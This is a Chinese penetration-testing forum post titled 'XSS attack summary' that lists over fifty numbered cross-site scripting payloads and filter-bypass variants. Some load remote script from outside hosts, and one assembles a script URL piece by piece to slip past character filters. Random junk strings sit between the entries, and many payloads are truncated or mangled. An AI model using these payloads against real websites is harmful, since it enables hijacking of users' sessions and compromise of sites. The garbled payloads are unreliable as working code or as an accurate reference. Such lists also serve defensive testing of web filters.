中国网络渗透测试联盟
标题:
XSS攻击汇总
[打印本页]
作者:
admin
时间:
2016-4-28 10:06
标题:
XSS攻击汇总
(1)普通的XSS JavaScript注入
' a% \ {- f. D% V
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
9 r5 r; N& w4 q0 R+ j+ n
(99)另类弹框
; g+ t1 N6 |" S( B* Z/ `
<q/oncut=alert()>1
2 O1 I, N* n2 @4 b& g2 J# q
<s/onclick=alert()>b
( u4 u0 G/ [" H0 K
<XSS=" onclick="alert(1)//">clickme</SSX=">
# Q8 ~+ X9 t; A* z5 U8 C" v
<zzz onclick=alert`1`>clickme</zzz>
/ f8 W+ {% @7 ^' b
<a onclick=alert`1`>clickme</a>
7 F: E) @8 U3 }1 R( t* U1 S3 [- b
<a=">clickme</a=">
, T" Z+ X4 U% U; H6 L3 Q
<a=">clickme</a>
h" `# e0 h$ S6 X) |; z
<z=">clickme</z=">
}; i* A6 W3 T+ X2 W" o! h; p
<z onclick=alert`1`>clickme</z>
, [! O3 w1 Z8 H
9 V9 |3 i: c6 @, \% W6 U
(2)IMG标签XSS使用JavaScript命令
5 y1 {' a+ r, p
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
" Q& T2 P% `( Q0 k9 Z
1 h9 k3 R9 P/ }) J/ j
(3)IMG标签无分号无引号
8 z) q5 e' U1 i1 t# B! O
<IMG SRC=javascript:alert(‘XSS’)>
2 T O* Z' u2 C% C5 @% T
$ I& Y6 {1 v2 w- \2 z# d$ i
(4)IMG标签大小写不敏感
4 Z5 ]5 L' L; i0 i# ~) u3 J
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
+ S4 L X( U5 H- A# _2 d
/ L0 G4 M! Z/ }
(5)HTML编码(必须有分号)
+ _ d+ W4 {( V) D) V* r
<IMG SRC=javascript:alert(“XSS”)>
; I' n8 ?4 L3 I# D' [* v
' B; [2 m8 @2 g0 R# `
(6)修正缺陷IMG标签
: s& K3 y* Z7 J5 a9 `$ d/ J
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
9 p0 a0 o8 P; s
* C3 p8 D4 R- f1 W* ~& r: P6 V+ `
(7)formCharCode标签(
计算器
)
, n, m7 }! ]& ]& }8 {
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
2 r& O5 I$ ^- _" \
j- ^/ u `7 A
(8)UTF-8的Unicode编码(
计算器
)
' f5 J# b7 I: V: t1 a+ D" G
<IMG SRC=jav..省略..S')>
" Q2 O1 X# a0 ?
% V* `6 o7 c+ {% [
(9)7位的UTF-8的Unicode编码是没有分号的(
计算器
)
: x7 C: ?8 b' A+ H, n
<IMG SRC=jav..省略..S')>
% C: f- m7 a9 Q8 [$ g
! ~) U" Y. \" K" x1 X7 j4 t Y+ @
(10)十六进制编码也是没有分号(
计算器
)
4 z* @% o, A( L
<IMG SRC=\'#\'" /span>
/ N9 a0 @2 i) G; j
% K( z7 V; S/ q$ J W/ D O
(11)嵌入式标签,将Javascript分开
, ?# Z( A5 ]: M5 C
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
1 t% f1 W3 Z: I9 ~
+ l$ {& e. Z# o
(12)嵌入式编码标签,将Javascript分开
) x) G, d+ F& U0 w' Q) N5 B. W* M$ |1 H
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
8 K; F5 t, ]& t' ~" }
+ n" J! o7 R, L
(13)嵌入式换行符
, s* ?: [# e( g, `, K4 c( A* K
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
' `# g m! j9 R" p7 x) X& g+ `
+ O1 j+ i. T/ C% s) F. O5 b3 g6 C
(14)嵌入式回车
/ M2 E4 E. S4 B0 U/ K+ ?& ^
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
8 F' j2 A) R9 y( c7 S0 H
9 b4 B$ H' Y3 ]9 s2 Q
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
- C! k1 q7 I' @" b
<IMG SRC=\'#\'" /span>
* ?3 o) \: ]0 X+ \/ ^6 _
& `. W7 l0 y" N9 _5 [. k: U
(16)解决限制字符(要求同页面)
7 Q+ O9 `9 R+ U0 Q5 ~9 q2 w" y
<script>z=’document.’</script>
" N3 n4 q9 F/ }' q
<script>z=z+’write(“‘</script>
6 e/ C' X* m! W2 }; v) I
<script>z=z+’<script’</script>
) u0 d) g, z4 @- G/ ^; d1 v( \: a
<script>z=z+’ src=ht’</script>
% C+ Z' U8 ~. }1 g, M5 N
<script>z=z+’tp://ww’</script>
$ S' }. g3 V/ V: T) o; O
<script>z=z+’w.shell’</script>
6 @% j5 j! R" T. l. [
<script>z=z+’.net/1.’</script>
; z" P8 ^* ?5 V/ c" @ c. p) a8 m
<script>z=z+’js></sc’</script>
) U* m, [# K( | N
<script>z=z+’ript>”)’</script>
. r/ I5 q4 A C T; B
<script>eval_r(z)</script>
; \1 M- w+ H2 a3 X3 }
, z" F$ N# ]6 T3 O7 p5 Z
(17)空字符
+ M5 q# k5 ~' Z* [& V" \& p
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
7 U3 Y& @) q: j/ K. N% [
% A9 {4 o+ G% F _2 _+ b
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
- U' l4 H4 ]8 j8 j
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
" |, ~) @* U: v* l; M9 T# h
2 Y/ C4 s0 z! I4 [' t8 P
(19)Spaces和meta前的IMG标签
* I+ K7 k) g6 N* m
<IMG SRC=\'#\'" javascript:alert(‘XSS’);”>
+ G+ m {6 p: y; @ [
7 t( L* T! ^" ?' n4 n8 {( c
(20)Non-alpha-non-digit XSS
+ q5 Z+ F9 O2 Z2 z6 T
<SCRIPT/XSS SRC=\'#\'" /span>
http://3w.org/XSS/xss.js
”></SCRIPT>
, A" E6 _- b$ K2 T, L7 r& n) |5 \
9 b# j- r' E0 z# _7 h2 w$ f5 f/ f
(21)Non-alpha-non-digit XSS to 2
7 K$ C+ E, n' w$ k
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
* j/ @9 h, u6 r) C. H5 }
* `2 {/ w s+ y+ p& X }
(22)Non-alpha-non-digit XSS to 3
4 G$ n! X5 h, |, n1 B% Z
<SCRIPT/SRC=\'#\'" /span>
http://3w.org/XSS/xss.js
”></SCRIPT>
. [# _/ l9 L C: U
" d6 Y' m& U& r( M8 I8 ~1 H
(23)双开括号
, b( ]. {* K# P% z3 h! b) b
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
+ o4 D3 j5 C- I& M- `/ i
0 C* i. _& Q, e/ M: f
(24)无结束脚本标记(仅火狐等浏览器)
1 j6 L/ ?& F- ~) K* @- {& u1 @
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
# ^5 e9 ?( E; |3 i
2 @- T! y6 [7 k1 C9 z) _7 W( n
(25)无结束脚本标记2
9 @6 D- r0 f1 p. U
<SCRIPT SRC=//3w.org/XSS/xss.js>
* U* U; V8 `& M
3 F$ r( V; V( l! c }
(26)半开的HTML/JavaScript XSS
2 W$ P9 A! d6 d2 @( p- A$ w
<IMG SRC=\'#\'" /span>
- v+ R) B; O" r# F8 f2 p: J
; Q8 f5 M5 L( [* j3 J) k+ J* v( X
(27)双开角括号
, V/ \7 D$ V# f/ h4 o* Z
<iframe src=http://3w.org/XSS.html <
9 P2 }3 E# Z+ e" }" P, m2 b
: m ?/ F+ U8 {' m5 y$ g
(28)无单引号 双引号 分号
$ K: z& V5 D* t" D
<SCRIPT>a=/XSS/
) O% `% U& c- f7 E* D
alert(a.source)</SCRIPT>
) }. ^# n/ @- Y: D" q
- C4 H) d L# `9 Y) j
(29)换码过滤的JavaScript
2 g9 H. @3 M/ s: C
\”;alert(‘XSS’);//
) h: f: \' Z, A# m/ J" ^4 E0 B
: m9 ~- C8 Q" i- u" P0 G
(30)结束Title标签
% T! ^& F' f3 E$ l' d. V
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
' e2 ~) b( G7 P! A9 l
' @1 ^9 p7 y+ D
(31)Input Image
" c" o; r3 Z+ O5 t0 \ i( Y
<INPUT SRC=\'#\'" /span>
; o( y6 I" e! \; P: p
: h- h1 i+ S9 E
(32)BODY Image
1 V! ?9 ~) u# y# L
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
* n+ ~1 I: S, z- |+ ?: ^
! E' s/ ]1 {% s7 g c: A
(33)BODY标签
3 v2 W2 @7 ~) l% c% _: r) q
<BODY(‘XSS’)>
% J& W8 g, T, L' l9 ^6 Z% y
0 s7 A. ]# v! F3 _, U6 o
(34)IMG Dynsrc
, b+ @: A5 z& `( t# `
<IMG DYNSRC=\'#\'" /span>
: M) n& P8 ]! E( ?2 L
2 C* x3 A! O+ C( F, N
(35)IMG Lowsrc
' U3 c2 W* P3 s# o' \ N, o: Y. j
<IMG LOWSRC=\'#\'" /span>
( e& v8 `# _$ U3 W
) X! v6 n9 z( S7 m# i, ]
(36)BGSOUND
3 D$ ~ s% P0 _0 P0 [
<BGSOUND SRC=\'#\'" /span>
: `$ U3 ?+ K/ K( M( p* R7 D' l
- }9 V) v; s) f2 a/ |
(37)STYLE sheet
9 C7 P$ E% Y: k4 @1 p" J
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
- c# ]' q- {" N6 z- W+ |' I& I# D
9 \6 y% Z5 u( u v* m% v! h
(38)远程样式表
0 |! D, e+ K0 D' B0 M8 X: J4 T
<LINK REL=”stylesheet” HREF=”
http://3w.org/xss.css
”>
( n2 k% l9 Q' r+ R8 |8 h/ y1 R
1 y# {7 Y$ P' K2 D! p2 K+ h- c
(39)List-style-image(列表式)
5 p0 d1 T3 ^0 h* ? x+ d
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
! K$ |! |1 C, }, x6 k
7 w' R2 p5 y0 H7 j
(40)IMG VBscript
1 W( c7 ^) N5 w: y
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS
8 [& d2 E0 Z& D/ P! C9 o+ t
' y( ]+ o9 l. U0 J9 Y) \
(41)META链接url
/ Y8 V8 n) W" [9 s7 G) g4 e; D# G
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
& ?& C/ G4 l6 n, r+ y
& K7 t; [0 t" e+ I7 n ~
(42)Iframe
: b# b8 d: B. @+ X1 C6 K
<IFRAME SRC=\'#\'" /IFRAME>
- t9 D" w ~- y3 V* \- C' ~4 h
4 Q% M! J) i- J8 ]
(43)Frame
R- P6 [1 L2 c/ g/ c8 p- s
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>
+ F( p' u9 V. J
* q5 S* X5 m |$ L
(44)Table
- |3 r+ c2 P A2 g& h
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
2 p3 Z' q0 ]5 d
1 }; p0 _* |. c& I
(45)TD
; u/ ~/ P( Z$ ]5 q9 ?
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
/ b/ u1 R* L! N
5 F8 H; Z9 Y( n B+ D
(46)DIV background-image
# I7 y. j) E: a" R7 Q9 w
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
& y3 X0 v; l- s' r
, y A. |# A+ x+ s' q
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
& o* F# P+ d4 _8 R
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
; B! m F- F' x0 g
1 Q' ^5 W) g% i8 E
(48)DIV expression
7 e" R# R* H* f/ l
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
6 H& k0 z2 L9 `* y
$ H: r9 H( L1 R6 d: \ E
(49)STYLE属性分拆表达
' ~0 D( j: ~7 J$ w' a6 Q5 r( y5 a
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
+ G* \2 f! K2 \) E/ |2 U, v
8 Y# m8 _# B6 q4 Q
(50)匿名STYLE(组成:开角号和一个字母开头)
U2 c1 t6 H8 o7 }" d4 f0 }! h
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
" y+ }8 T9 P5 U1 V+ O: k
# A* v; R4 r( |$ e/ ?$ x" ~
(51)STYLE background-image
, ]5 X7 ], `' C/ E
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
: ?4 c9 V2 z) O. k8 O+ O, m
2 P w) o8 J5 [
(52)IMG STYLE方式
6 N b" n4 r' h* {
exppression(alert(“XSS”))’>
2 s7 Z7 x3 _: n4 C- M7 _6 i, V) G4 h
7 u2 L4 G K) i0 e8 t
(53)STYLE background
8 i/ h' T5 d u' x* K$ t
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
' \ [. L6 m7 ^" r! T5 i3 Z
3 r! I2 v* ^6 X
(54)BASE
$ |( @* P) C) r7 q) d
<BASE HREF=”javascript:alert(‘XSS’);//”>
; T/ |) ~6 e' X) k9 @: `
8 e" V9 [& J! c3 R" O/ _0 j% ~
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
. w" y" G: a8 e' M
<EMBED SRC=\'#\'" /span>
http://3w.org/XSS/xss.swf
” ></EMBED>
, Q/ P: P3 R5 H5 T2 E
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2